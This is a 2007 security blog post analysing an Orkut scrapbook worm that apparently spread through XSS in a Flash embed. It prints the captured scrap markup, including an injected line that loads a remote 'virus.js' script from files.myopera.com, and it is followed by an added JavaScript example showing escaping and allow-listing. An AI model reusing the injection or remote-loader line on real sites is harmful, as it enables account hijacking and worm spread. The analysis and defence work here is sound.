
Orkut "virus"
More of a worm, actually.
I had an email from Orkut this evening telling me I had a new scrapbook entry. I don’t really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:
2008 vem ai... que ele comece mto bem para vc
I still don’t know exactly what it means, I’m assuming it’s Portuguese. Babelfish wasn’t any help. I won’t mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!
I haven’t done any kind of thorough analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:
<div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div>
<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627');
flashWriter._addParam('wmode', 'transparent');
script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv295378627');
</script>
Looks like it joins you to an Orkut group, too:
Infectados pelo Vírus do Orkut.
Owner of the group is a new-looking account named “Virus do Orkut”. Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"
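In the captured scrap, the extra statements sit between `_addParam('wmode', 'transparent');` and `escape('');`, which is the shape left behind when a value is pasted unescaped into a JavaScript string literal. The following is an added example, not Orkut's code and not part of the original post: it assumes the wmode value was user-supplied, uses hypothetical function names and a constructed harmless input, and contrasts the unescaped writer with an encoded and allow-listed one.

```javascript
// Added example. All names are hypothetical; SAMPLE is constructed and harmless.
const SAMPLE = "transparent'); injected(); escape('";

// Vulnerable shape: the value is pasted between single quotes in an inline script.
function writeParamUnsafe(name, value) {
  return "flashWriter._addParam('" + name + "', '" + value + "');";
}

// Encode for a JS string literal inside an HTML <script> block: everything
// outside a small safe set becomes \uXXXX, so quotes, backslashes, line
// terminators and "</script>" cannot end the literal or the element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,-]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function writeParamSafe(name, value) {
  return "flashWriter._addParam('" + jsStringEscape(name) + "', '" +
    jsStringEscape(value) + "');";
}

// Stronger still: wmode has a few legal values, so allow-list it and
// fall back to the default for anything else.
const WMODE_VALUES = new Set(["window", "opaque", "transparent"]);
function normalizeWmode(value) {
  const v = String(value).toLowerCase();
  return WMODE_VALUES.has(v) ? v : "window";
}

// Run generated code against stubs and record which calls it makes.
// Only ever fed the constructed SAMPLE above.
function runGenerated(code) {
  const calls = [];
  const flashWriter = { _addParam: (n, v) => calls.push(["param", n, v]) };
  const injected = () => calls.push(["injected"]);
  new Function("flashWriter", "injected", "escape", code)(
    flashWriter, injected, () => "");
  return calls;
}

console.log(runGenerated(writeParamUnsafe("wmode", SAMPLE))); // value breaks out
console.log(runGenerated(writeParamSafe("wmode", SAMPLE)));   // value stays data
console.log(normalizeWmode(SAMPLE));                          // rejected value
```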
*** This is a Security Bloggers Network syndicated blog from ryanlrussell authored by Ryan Russell. Read the original post at: http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html